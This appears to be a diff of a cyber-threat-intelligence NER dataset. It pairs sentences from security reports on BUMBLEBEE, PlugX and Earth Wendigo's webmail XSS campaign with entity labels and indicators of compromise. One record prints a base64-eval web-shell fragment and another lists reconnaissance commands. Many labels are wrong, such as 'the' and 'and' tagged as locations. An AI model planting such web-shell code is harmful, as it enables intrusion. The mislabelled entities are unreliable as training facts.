+{"id":3138,"text":"They\u2019re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":48266,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} +{"id":818,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":7686,"text":"Figure 1. Infection chains for ServHelper installation Figure 2.","entities":[{"id":23911,"label":"malware","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} +{"id":2211,"text":"The parent process check is not used in this particular sample.","entities":[],"relations":[],"Comments":[]} +{"id":4136,"text":"With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.","entities":[],"relations":[],"Comments":[]} +{"id":13209,"text":" The overview provided above highlights how putting critical information in physically isolated networks is not a bulletproof solution for defending against cyberespionage.","entities":[],"relations":[],"Comments":[]} +{"id":13086,"text":"This burgeoning world of connected IoT devices is particularly advanced in the manufacturing space, where huge gains are already being made.","entities":[],"relations":[],"Comments":[]} +{"id":3983,"text":"The compromised software will then put the customer's data or system at risk.","entities":[],"relations":[],"Comments":[]} +{"id":6512,"text":"We observed it operating in the following countries: Azerbaijan Bahrain Israel Saudi Arabia United Arab Emirates Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":12520,"text":"Full details of Glupteba\u2019s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":38979,"label":"malware","start_offset":16,"end_offset":24},{"id":38980,"label":"location","start_offset":44,"end_offset":47},{"id":38982,"label":"location","start_offset":127,"end_offset":130},{"id":38983,"label":"location","start_offset":131,"end_offset":134}],"relations":[],"Comments":[]} +{"id":14078,"text":"The malware campaigns previously attributed to APT37 also extensively used the exploitation of web sites hosted with GNUBoard CMS.","entities":[{"id":48157,"label":"SOFTWARE","start_offset":117,"end_offset":126},{"id":43567,"label":"threat-actor","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} +{"id":7858,"text":"For these devices, ADB debugging must be enabled for backup to work.","entities":[],"relations":[],"Comments":[]} +{"id":8999,"text":"We also noticed network communications from this victim to a subdomain of Earth Berberoka, suggesting it could have been previously compromised by this threat actor.","entities":[],"relations":[],"Comments":[]} +{"id":2536,"text":"When Ireland's healthcare system refused to pay any ransom, Conti provided the agency with what it said was a free decryption key.","entities":[{"id":47728,"label":"location","start_offset":5,"end_offset":12},{"id":47729,"label":"attack-pattern","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} +{"id":2012,"text":"Tox is a peer-to-peer instant messaging protocol that offers end-to-end encryption and has been observed being used by other ransomware groups for negotiations.","entities":[],"relations":[],"Comments":[]} +{"id":13701,"text":"Scrutinize all emails.","entities":[],"relations":[],"Comments":[]} +{"id":3070,"text":"This is the main reason we classify the program as Scareware rather than just Fake AV.","entities":[],"relations":[],"Comments":[]} +{"id":8133,"text":"Code enable accessibility permission of the newly installed app","entities":[],"relations":[],"Comments":[]} +{"id":3819,"text":"The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC","entities":[{"id":11597,"label":"malware","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} +{"id":14191,"text":"Already the Conti and Lockbit ransomware collectives have stated their support.","entities":[{"id":48229,"label":"threat-actor","start_offset":12,"end_offset":18},{"id":48230,"label":"threat-actor","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} +{"id":3921,"text":"var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\")); var c=eval(a,b); eval(c,b); %>","entities":[],"relations":[],"Comments":[]} +{"id":7304,"text":"Get serial number ifconfig -l ifconfig | awk '\/ether \/{print $2}' 2>&1 Get network interface MAC addresses Table 2.","entities":[{"id":22764,"label":"tools","start_offset":21,"end_offset":29},{"id":22765,"label":"tools","start_offset":33,"end_offset":41}],"relations":[],"Comments":[]} +{"id":7179,"text":" Figure 1. Watering hole reconnaissance flow Analysis of the Andariel techniques","entities":[{"id":22443,"label":"location","start_offset":20,"end_offset":24},{"id":22444,"label":"threat-actor","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} +{"id":1756,"text":"After his slides were released, researchers began working to determine what the missing parts were.","entities":[],"relations":[],"Comments":[]} +{"id":624,"text":"This is the same exploit the WanaCrypt0r\/WannaCry malware exploited to spread globally in May, 2017.","entities":[{"id":2086,"label":"malware","start_offset":29,"end_offset":40},{"id":2087,"label":"malware","start_offset":41,"end_offset":49},{"id":44808,"label":"TIME","start_offset":90,"end_offset":99}],"relations":[],"Comments":[]} +{"id":6526,"text":"PDF.RemoteUtilities.A","entities":[],"relations":[],"Comments":[]} +{"id":4753,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} +{"id":4181,"text":"Information on how a threat enters and operates within a victim\u2019s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations.","entities":[],"relations":[],"Comments":[]} +{"id":3193,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":6081,"text":"These samples have some indicators that suggest they were custom-built to be used by the group.","entities":[],"relations":[],"Comments":[]} -{"id":6084,"text":"The loader can be recognized by its use of a unique user-agent “bumblebee” which both variants share.","entities":[{"id":18780,"label":"location","start_offset":11,"end_offset":14},{"id":18781,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} -{"id":6085,"text":"The malware, hence dubbed BUMBLEBEE, uses WMI to collect various system details such as OS version, user name and domain name, which are then exfiltrated in JSON format to a C2.","entities":[{"id":18782,"label":"malware","start_offset":26,"end_offset":35},{"id":18783,"label":"location","start_offset":110,"end_offset":113},{"id":18784,"label":"location","start_offset":133,"end_offset":136}],"relations":[],"Comments":[]} -{"id":6087,"text":"At the time of the analysis, BUMBLEBEE was observed to fetch Cobalt Strike payloads.","entities":[{"id":18787,"label":"location","start_offset":7,"end_offset":11},{"id":18788,"label":"malware","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} -{"id":6089,"text":"EXOTIC LILY activities overlap with a group tracked as DEV-0413 (Microsoft) and were also described by Abnormal in their recent post.","entities":[{"id":18792,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":18793,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":18795,"label":"location","start_offset":76,"end_offset":79},{"id":18797,"label":"location","start_offset":128,"end_offset":132}],"relations":[],"Comments":[]} -{"id":6091,"text":"We believe the shift to deliver BazarLoader, along with some other indicators such as a unique Cobalt Strike profile (described by RiskIQ) further confirms the existence of a relationship between EXOTIC LILY and actions of a Russian cyber crime group tracked as WIZARD SPIDER (CrowdStrike), FIN12 (Mandiant, FireEye) and DEV-0193 (Microsoft).","entities":[{"id":18809,"label":"location","start_offset":45,"end_offset":50},{"id":18812,"label":"location","start_offset":188,"end_offset":195},{"id":18814,"label":"location","start_offset":208,"end_offset":211},{"id":18818,"label":"threat-actor","start_offset":291,"end_offset":296},{"id":18821,"label":"location","start_offset":317,"end_offset":320}],"relations":[],"Comments":[]} -{"id":6093,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[{"id":18829,"label":"tools","start_offset":102,"end_offset":108},{"id":18830,"label":"location","start_offset":109,"end_offset":112},{"id":18831,"label":"location","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} -{"id":6098,"text":"Recent domains used in email campaigns: BazarLoader ISO samples: Recent BUMBLEBEE ISO samples: Recent BUMBLEBEE C2:","entities":[{"id":18855,"label":"malware","start_offset":72,"end_offset":81},{"id":18856,"label":"malware","start_offset":102,"end_offset":111}],"relations":[],"Comments":[]} -{"id":6099,"text":"Recently, FireEye published a blog titled “Operation Poisoned Hurricane” which detailed the use of PlugX malware variants signed with legitimate certificates that used Google Code project pages for command and control (C2).","entities":[{"id":18858,"label":"location","start_offset":62,"end_offset":71},{"id":18859,"label":"malware","start_offset":99,"end_offset":104},{"id":18860,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} -{"id":6100,"text":"We were able to uncover multiple additional samples exploiting the same technique as well as an additional Google Code account with multiple projects containing encoded commands.","entities":[{"id":18861,"label":"tools","start_offset":16,"end_offset":23},{"id":18862,"label":"location","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} -{"id":6101,"text":"The attacks against Palo Alto Networks customers, which took place between early June to early July, also targeted users in East Asia; in this case an international law firm’s regional office and a major university.","entities":[{"id":18866,"label":"location","start_offset":143,"end_offset":147},{"id":18867,"label":"location","start_offset":151,"end_offset":164},{"id":18868,"label":"location","start_offset":165,"end_offset":168},{"id":18869,"label":"tools","start_offset":185,"end_offset":191},{"id":18870,"label":"location","start_offset":192,"end_offset":195},{"id":18871,"label":"location","start_offset":198,"end_offset":203},{"id":18872,"label":"location","start_offset":204,"end_offset":214}],"relations":[],"Comments":[]} -{"id":6102,"text":"All of the attacks were detected by our WildFire platform.","entities":[{"id":18873,"label":"malware","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} -{"id":6103,"text":" Of note, three of the Google Code projects associated with the newly uncovered account were added during the past few days, indicating it is still in active use. Below is a current screenshot of the newly uncovered Google Code account’s projects.","entities":[],"relations":[],"Comments":[]} -{"id":6104,"text":" The encoded commands decode to the below IP addresses.","entities":[],"relations":[],"Comments":[]} -{"id":6105,"text":"Interestingly, “\/p\/pthon”, which is the project page used by some of the newly discovered samples detailed later in this blog, is the only page with the encoded command not included in the summary and is instead in text only on the page itself.","entities":[{"id":18878,"label":"tools","start_offset":48,"end_offset":52},{"id":18879,"label":"location","start_offset":134,"end_offset":138},{"id":18880,"label":"malware","start_offset":139,"end_offset":143},{"id":18881,"label":"location","start_offset":197,"end_offset":200},{"id":18882,"label":"location","start_offset":220,"end_offset":224},{"id":18883,"label":"tools","start_offset":232,"end_offset":236}],"relations":[],"Comments":[]} -{"id":6107,"text":" Table 1 We discovered a total of seven samples, five of which were not in VirusTotal prior to our submission.","entities":[],"relations":[],"Comments":[]} -{"id":6108,"text":"Table 2 contains details of a PlugX sample using the PixelPlus Co., Ltd certificate that is currently only detected by four AV vendors.","entities":[{"id":18892,"label":"malware","start_offset":30,"end_offset":35},{"id":18893,"label":"location","start_offset":36,"end_offset":42},{"id":18895,"label":"location","start_offset":102,"end_offset":106}],"relations":[],"Comments":[]} -{"id":6112,"text":"Interestingly, the IP resolved by the initial website hosting the PlugX malware also served as a C2 server for different malware in mid-December 2013 (MD5: ddd46ce5e5eaaa8e61ce11a121a79266).","entities":[{"id":18905,"label":"malware","start_offset":66,"end_offset":71},{"id":18907,"label":"MD5","start_offset":156,"end_offset":188}],"relations":[],"Comments":[]} -{"id":6114,"text":"Table 2 ","entities":[],"relations":[],"Comments":[]} -{"id":6115,"text":"The PlugX sample in Table 3 also uses the legitimate PixelPlus Co., Ltd certificate and was also targeted against the university.","entities":[{"id":18910,"label":"tools","start_offset":4,"end_offset":9},{"id":18911,"label":"location","start_offset":10,"end_offset":16},{"id":18914,"label":"location","start_offset":84,"end_offset":87},{"id":18915,"label":"location","start_offset":118,"end_offset":128}],"relations":[],"Comments":[]} -{"id":6117,"text":"It is correctly identified by eleven AV vendors as PlugX malware.","entities":[{"id":18919,"label":"malware","start_offset":51,"end_offset":56}],"relations":[],"Comments":[]} -{"id":6119,"text":"The registrant information associated with the website hosting the malware is a domain reseller.","entities":[],"relations":[],"Comments":[]} -{"id":6120,"text":" Table 3 ","entities":[],"relations":[],"Comments":[]} -{"id":6121,"text":"We were able to uncover an additional two samples using the QTI International Inc certificate and Google Code pages.","entities":[{"id":18926,"label":"tools","start_offset":16,"end_offset":23},{"id":18929,"label":"location","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} -{"id":6123,"text":"Only three AV vendors correctly identified it as PlugX malware.","entities":[{"id":18938,"label":"malware","start_offset":49,"end_offset":54}],"relations":[],"Comments":[]} -{"id":6124,"text":" Table 4 The second sample using the QTI International Inc certificate also uses IP 211.233.89.182 for C2 but does not first connect to a Google Code page and is not PlugX.","entities":[{"id":18941,"label":"location","start_offset":21,"end_offset":27},{"id":18943,"label":"IPV4","start_offset":85,"end_offset":99},{"id":18944,"label":"tools","start_offset":151,"end_offset":155},{"id":18945,"label":"location","start_offset":156,"end_offset":159}],"relations":[],"Comments":[]} -{"id":6127,"text":"Of note, the PlugX sample in Table 8 uses a different certificate but was downloaded from the same website.","entities":[{"id":18957,"label":"tools","start_offset":13,"end_offset":18},{"id":18958,"label":"location","start_offset":19,"end_offset":25},{"id":18960,"label":"location","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} -{"id":6128,"text":"It also uses the Google Code page “\/p\/tempzz” for C2, which was also listed in FireEye’s blog.","entities":[{"id":18961,"label":"malware","start_offset":29,"end_offset":33}],"relations":[],"Comments":[]} -{"id":6129,"text":" The website hosting the malware was registered 4 June 2014 via eNom, a well-known domain name registrar.","entities":[],"relations":[],"Comments":[]} -{"id":6131,"text":"Table 5 ","entities":[],"relations":[],"Comments":[]} -{"id":6132,"text":"Our team was able to further uncover three new samples using the Ssanyong Motor Co., Ltd certificate and Google Code C2 redirection.","entities":[{"id":18968,"label":"tools","start_offset":29,"end_offset":36},{"id":18971,"label":"location","start_offset":101,"end_offset":104}],"relations":[],"Comments":[]} -{"id":6135,"text":"The PlugX sample in Table 4 used the same Google Code page and redirect, but the QTI International Inc certificate.","entities":[{"id":18976,"label":"malware","start_offset":4,"end_offset":9},{"id":18977,"label":"location","start_offset":10,"end_offset":16},{"id":18979,"label":"location","start_offset":37,"end_offset":41},{"id":18980,"label":"tools","start_offset":54,"end_offset":58},{"id":18981,"label":"location","start_offset":59,"end_offset":62}],"relations":[],"Comments":[]} -{"id":6136,"text":"The below PlugX sample was only detected as PlugX malware by two AV vendors.","entities":[{"id":18983,"label":"malware","start_offset":10,"end_offset":15},{"id":18984,"label":"location","start_offset":16,"end_offset":22},{"id":18985,"label":"location","start_offset":27,"end_offset":31},{"id":18986,"label":"malware","start_offset":44,"end_offset":49}],"relations":[],"Comments":[]} -{"id":6137,"text":" Table 6 ","entities":[],"relations":[],"Comments":[]} -{"id":6138,"text":"The PlugX sample in Table 7 also targeted the same university as all previous samples.","entities":[{"id":18989,"label":"tools","start_offset":4,"end_offset":9},{"id":18990,"label":"location","start_offset":10,"end_offset":16},{"id":18992,"label":"location","start_offset":46,"end_offset":50},{"id":18993,"label":"location","start_offset":51,"end_offset":61}],"relations":[],"Comments":[]} -{"id":6139,"text":"Eight AV vendors correctly identified it.","entities":[],"relations":[],"Comments":[]} -{"id":6140,"text":" Table 7 ","entities":[],"relations":[],"Comments":[]} -{"id":6142,"text":"It was downloaded from the same website as the sample in Table 5; however, it was targeted against an international law firm’s East Asian office, and uses a Google Code page identified in FireEye’s blog for C2, but an IP not listed in the blog post.","entities":[{"id":18998,"label":"location","start_offset":27,"end_offset":31},{"id":18999,"label":"location","start_offset":47,"end_offset":53},{"id":19001,"label":"location","start_offset":102,"end_offset":115},{"id":19002,"label":"location","start_offset":116,"end_offset":119},{"id":19004,"label":"tools","start_offset":138,"end_offset":144},{"id":19005,"label":"location","start_offset":146,"end_offset":149},{"id":19006,"label":"location","start_offset":169,"end_offset":173},{"id":19008,"label":"location","start_offset":244,"end_offset":248}],"relations":[],"Comments":[]} -{"id":6151,"text":"Additional investigation shows that the threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.","entities":[{"id":19031,"label":"location","start_offset":63,"end_offset":68},{"id":19032,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":19033,"label":"location","start_offset":162,"end_offset":165},{"id":19036,"label":"location","start_offset":220,"end_offset":226}],"relations":[],"Comments":[]} -{"id":6152,"text":"However, this is a separate series of attacks from their operation in Taiwan, which this report covers.","entities":[],"relations":[],"Comments":[]} -{"id":6153,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":6154,"text":"The attack flow of Earth Wendigo’s operation Figure 2.","entities":[{"id":19040,"label":"threat-actor","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":6155,"text":"An example of a spear-phishing email sent by Earth Wendigo to a democracy activist.","entities":[{"id":19042,"label":"location","start_offset":16,"end_offset":21},{"id":19043,"label":"attack-pattern","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} -{"id":6158,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} -{"id":6160,"text":"Propagation","entities":[],"relations":[],"Comments":[]} -{"id":6161,"text":"The attack begins with a spear-phishing email that is appended with obfuscated JavaScript.","entities":[{"id":19050,"label":"location","start_offset":25,"end_offset":30},{"id":19051,"label":"attack-pattern","start_offset":31,"end_offset":39}],"relations":[],"Comments":[]} -{"id":6164,"text":"Appending their malicious script to the victim’s email signature to propagate the infection to their contacts.","entities":[],"relations":[],"Comments":[]} -{"id":6165,"text":"Exploiting a webmail system’s cross-site scripting (XSS) vulnerability to allow their malicious JavaScript to be injected on the webmail page permanently.","entities":[{"id":19061,"label":"location","start_offset":30,"end_offset":35},{"id":19062,"label":"attack-pattern","start_offset":41,"end_offset":50},{"id":19063,"label":"attack-pattern","start_offset":52,"end_offset":55},{"id":19064,"label":"location","start_offset":137,"end_offset":141}],"relations":[],"Comments":[]} -{"id":6167,"text":"The registered Service Worker script can hijack login credentials and modify the webmail page to add malicious scripts in case the attackers were unable to inject the XSS vulnerability mentioned above.","entities":[{"id":19069,"label":"location","start_offset":37,"end_offset":40},{"id":19070,"label":"location","start_offset":66,"end_offset":69},{"id":19071,"label":"location","start_offset":89,"end_offset":93},{"id":19072,"label":"location","start_offset":122,"end_offset":126},{"id":19073,"label":"attack-pattern","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} -{"id":6169,"text":"After the attackers gain a foothold into the system — either through XSS injection or Service Worker — the next (and final part) of the attack chain, the exfiltration of the mailbox, is initiated.","entities":[{"id":19076,"label":"attack-pattern","start_offset":69,"end_offset":72},{"id":19077,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} -{"id":6173,"text":"The victim will receive a spear-phishing email disguised as an advertisement with a discount coupon from an online shopping website — however, an obfuscated malicious JavaScript is embedded inside.","entities":[{"id":19086,"label":"location","start_offset":11,"end_offset":15},{"id":19087,"label":"location","start_offset":26,"end_offset":31},{"id":19088,"label":"attack-pattern","start_offset":32,"end_offset":40},{"id":19089,"label":"location","start_offset":93,"end_offset":99}],"relations":[],"Comments":[]} -{"id":6174,"text":"The email leverages the webmail system’s search suggestion function to trigger the webpage to execute their script instead of directly running the malicious script.","entities":[],"relations":[],"Comments":[]} -{"id":6181,"text":" Figure 3. The spear-phishing email disguised as an advertisement for a shopping coupon Figure 4.","entities":[{"id":19106,"label":"location","start_offset":19,"end_offset":24},{"id":19107,"label":"attack-pattern","start_offset":25,"end_offset":33},{"id":19108,"label":"location","start_offset":85,"end_offset":91}],"relations":[],"Comments":[]} -{"id":6183,"text":"However, these emails don’t look like phishing emails and seemed more like real email sent from normal users within the same organization.","entities":[{"id":19113,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":19114,"label":"location","start_offset":54,"end_offset":57},{"id":19115,"label":"location","start_offset":75,"end_offset":79},{"id":19116,"label":"location","start_offset":96,"end_offset":102},{"id":19117,"label":"location","start_offset":120,"end_offset":124}],"relations":[],"Comments":[]} -{"id":6184,"text":"Further investigation revealed that the attacker had modified the victims’ email signatures through malicious code injection.","entities":[{"id":19118,"label":"attack-pattern","start_offset":110,"end_offset":124}],"relations":[],"Comments":[]} -{"id":6186,"text":"We think the threat actor used this approach to attempt to infect the victim’s contacts for further propagation.","entities":[],"relations":[],"Comments":[]} -{"id":6187,"text":" Figure 5. Malicious script appended on the victim’s email signature Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":6189,"text":" As soon as the user executes the malicious script in the email, a cookie stealer script will be delivered and launched on the browser.","entities":[{"id":19125,"label":"malware","start_offset":77,"end_offset":84},{"id":19126,"label":"location","start_offset":92,"end_offset":96},{"id":19127,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} -{"id":6193,"text":"The framework used to deliver and manage these XSS attack scripts is called “XSSER.ME” or “XSS Framework.” The stolen session keys and browser cookies are also sent to the framework to store in the database. While a stolen session key may allow the attacker to log into their target’s webmail system without a password, note that this is not the Earth Wendigo operation's ultimate goal. Figure 7.","entities":[{"id":19135,"label":"location","start_offset":30,"end_offset":33},{"id":19136,"label":"location","start_offset":34,"end_offset":40},{"id":19137,"label":"attack-pattern","start_offset":47,"end_offset":50},{"id":19138,"label":"attack-pattern","start_offset":91,"end_offset":94},{"id":19139,"label":"location","start_offset":131,"end_offset":134},{"id":19140,"label":"location","start_offset":151,"end_offset":154},{"id":19141,"label":"location","start_offset":237,"end_offset":240},{"id":19142,"label":"location","start_offset":278,"end_offset":284},{"id":19143,"label":"threat-actor","start_offset":348,"end_offset":361}],"relations":[],"Comments":[]} -{"id":6196,"text":"The actor prepared two different infection methods.","entities":[],"relations":[],"Comments":[]} -{"id":6197,"text":"The first involves injecting malicious code into the webpage via an XSS vulnerability on the webmail system.","entities":[{"id":19149,"label":"attack-pattern","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} -{"id":6198,"text":"The vulnerability, which exists inside the webmail system’s shortcut feature, allows users to create links on the webmail front page.","entities":[{"id":19150,"label":"tools","start_offset":128,"end_offset":132}],"relations":[],"Comments":[]} -{"id":6199,"text":"The attacker can add a shortcut with a crafted payload by exploiting the XSS vulnerability, which replaces part of the original script from the webmail system with malicious JavaScript code.","entities":[{"id":19151,"label":"location","start_offset":13,"end_offset":16},{"id":19152,"label":"attack-pattern","start_offset":73,"end_offset":76}],"relations":[],"Comments":[]} -{"id":6202,"text":"We have reported the vulnerability to the company that developed the webmail system, which informed us that the vulnerability had been fixed since January 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6204,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":6205,"text":"A shortcut containing malicious code that was added to the webmail system Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":6206,"text":"The query format used to trigger the XSS vulnerability Service Worker script exploitation","entities":[{"id":19163,"label":"attack-pattern","start_offset":37,"end_offset":40}],"relations":[],"Comments":[]} -{"id":6209,"text":"By examining one of the malicious scripts from the Earth Wendigo campaign, we discovered that it uploaded the tampered Service Worker script to the webmail server disguised as an original script provided by the server.","entities":[{"id":19173,"label":"threat-actor","start_offset":51,"end_offset":64},{"id":19174,"label":"location","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} -{"id":6210,"text":"It then registers the uploaded script to the user’s Service Worker before removing it from the server immediately after registration.","entities":[],"relations":[],"Comments":[]} -{"id":6212,"text":"For requests sent to “\/cgi-bin\/start,” which is a page wrapper used to show the main webmail page, the Service Worker script will reply by sending another page to the victim.","entities":[{"id":19182,"label":"location","start_offset":31,"end_offset":36},{"id":19183,"label":"malware","start_offset":50,"end_offset":54},{"id":19184,"label":"location","start_offset":93,"end_offset":97},{"id":19185,"label":"location","start_offset":125,"end_offset":129},{"id":19186,"label":"malware","start_offset":155,"end_offset":159}],"relations":[],"Comments":[]} -{"id":6213,"text":"This new page is almost similar to the original wrapper but injected with a script element meant to load malicious script from Earth Wendigo’s server.","entities":[{"id":19187,"label":"location","start_offset":9,"end_offset":13},{"id":19188,"label":"location","start_offset":100,"end_offset":104},{"id":19189,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[],"Comments":[]} -{"id":6214,"text":"Therefore, the victim also loads the malicious script with the replaced wrapper page whenever they access the webmail server with the malicious Service Worker enabled in the background.","entities":[{"id":19190,"label":"tools","start_offset":80,"end_offset":84}],"relations":[],"Comments":[]} -{"id":6217,"text":"We found that the returned script is a backdoor that gets its instructions from the WebSocket server.","entities":[],"relations":[],"Comments":[]} -{"id":6219,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} -{"id":6220,"text":"The email exfiltration flow with WebSocket backdoor Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":6221,"text":"The script used to establish WebSocket communication Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":6227,"text":"Additional Findings","entities":[],"relations":[],"Comments":[]} -{"id":6228,"text":"Besides their attack on webmail servers, we also found multiple malware variants used by Earth Wendigo.","entities":[],"relations":[],"Comments":[]} -{"id":6232,"text":"However, we don’t know what code they delivered because the server was already down when we were verifying the malware variants.","entities":[],"relations":[],"Comments":[]} -{"id":6234,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} -{"id":6235,"text":"The Python script decompiled from the malware","entities":[],"relations":[],"Comments":[]} -{"id":6236,"text":" Conclusion","entities":[],"relations":[],"Comments":[]} -{"id":6237,"text":"While Earth Wendigo uses typical spear-phishing techniques to initiate their attack, the threat actor also uses many atypical techniques to infiltrate the targeted organizations, such as the use of mail signature manipulation and Service Worker infection.","entities":[{"id":19240,"label":"threat-actor","start_offset":6,"end_offset":19},{"id":19241,"label":"location","start_offset":33,"end_offset":38},{"id":19242,"label":"attack-pattern","start_offset":39,"end_offset":47},{"id":19243,"label":"location","start_offset":112,"end_offset":116},{"id":19244,"label":"location","start_offset":226,"end_offset":229}],"relations":[],"Comments":[]} -{"id":6238,"text":"The impact of spear-phishing attacks can be minimized by following security best practices, which include refraining from opening emails sent by suspicious sources.","entities":[{"id":19245,"label":"location","start_offset":4,"end_offset":10},{"id":19246,"label":"location","start_offset":14,"end_offset":19},{"id":19247,"label":"attack-pattern","start_offset":20,"end_offset":28},{"id":19248,"label":"location","start_offset":37,"end_offset":40},{"id":19249,"label":"location","start_offset":67,"end_offset":75},{"id":19250,"label":"location","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} -{"id":6240,"text":"To avoid XSS attacks similar to what we described in this report, we recommend adapting Contant-Security-Policy (CSP) for websites.","entities":[{"id":19252,"label":"attack-pattern","start_offset":9,"end_offset":12},{"id":19253,"label":"location","start_offset":96,"end_offset":104}],"relations":[],"Comments":[]} -{"id":6241,"text":"Indicators of Compromise Indicator Description Detection mail2000tw[.]com Domain operated by Earth Wendigo bf[.]mail2000tw[.]com Domain operated by Earth Wendigo admin[.]mail2000tw[.]com Domain operated by Earth Wendigo googletwtw[.]com Domain operated by Earth Wendigo bf[.]googletwtw[.]com Domain operated by Earth Wendigo ws[.]googletwtw[.]com Domain operated by Earth Wendigo admin[.]googletwtw[.]com Domain operated by Earth Wendigo anybodyopenfind[.]com Domain operated by Earth Wendigo support[.]anybodyopenfind[.]com Domain operated by Earth Wendigo supports[.]anybodyopenfind[.]com Domain operated by Earth Wendigo supportss[.]anybodyopenfind[.]com Domain operated by Earth Wendigo a61e84ac9b9d3009415c7982887dd7834ba2e7c8ea9098f33280d82b9a81f923 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 66cf12bb9b013c30f9db6484caa5d5d0a94683887cded2758886aae1cb5c1c65 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 4cdaca6b01f52092a1dd30fc68ee8f6d679ea6f7a21974e4a3eb8d14be6f5d74 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A f50a589f3b3ebcc326bab55d1ef271dcec372c25d65f381a409ea85929a34b49 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A e047aa878f9e7a55a80cc1b70d0ac9840251691e91ab6454562afbff427b0879 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A a1a6dc2a6c795fc315085d00aa7fdabd1f043b28c68d4f98d4152fe539f026f1 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 10d2158828b953ff1140376ceb79182486525fd14b98f743dafa317110c1b289 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 0e04a03afa5b66014457136fb4d437d51da9067dc88452f9ebd098d10c97c5b8 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 75f3f724a2bfda1e74e0de36ff6a12d3f2ea599a594845d7e6bc7c76429e0fa4 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A c3bc364409bb0c4453f6d80351477ff8a13a1acdc5735a9dff4ea4b3f5ad201c Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 5251087bb2a0c87ac60c13f2edb7c39fb1ea26984fcc07e4cf8b39db31ce2b08 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 7fa9a58163dd233065a86f9ed6857ed698fc6e454e6b428ea93f4f711279fb61 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A f568f823959be80a707e05791718c1c3c377da1b0db1865821c1cf7bc53b6084 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A a54d58d5a5812abaede3e2012ae757d378fb51c7d3974eaa3a3f34511161c1db Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 77c3d62cce21c2c348f825948042f7d36999e3be80db32ac98950e88db4140b1 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A c0dabb52c73173ea0b597ae4ad90d67c23c85110b06aa3c9e110a852ebe04420 Earth Wendigo Service Worker script Trojan.JS.WENDIGOE.A efe541889f3da7672398d7ad00b8243e94d13cc3254ed59cd547ad172c1aa4be Earth Wendigo WebSocket JavaScript backdoor Backdoor.JS.WENDIGOE.A 2411b7b9ada83f6586278e0ad36b42a98513c9047a272a5dcb4a2754ba8e6f1d Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.A 1de54855b15fc55b4a865723224119029e51b381a11fda5d05159c74f50cb7de Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.A d935c9fe8e229f1dabcc0ceb02a9ce7130ae313dd18de0b1aca69741321a7d1b Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.B 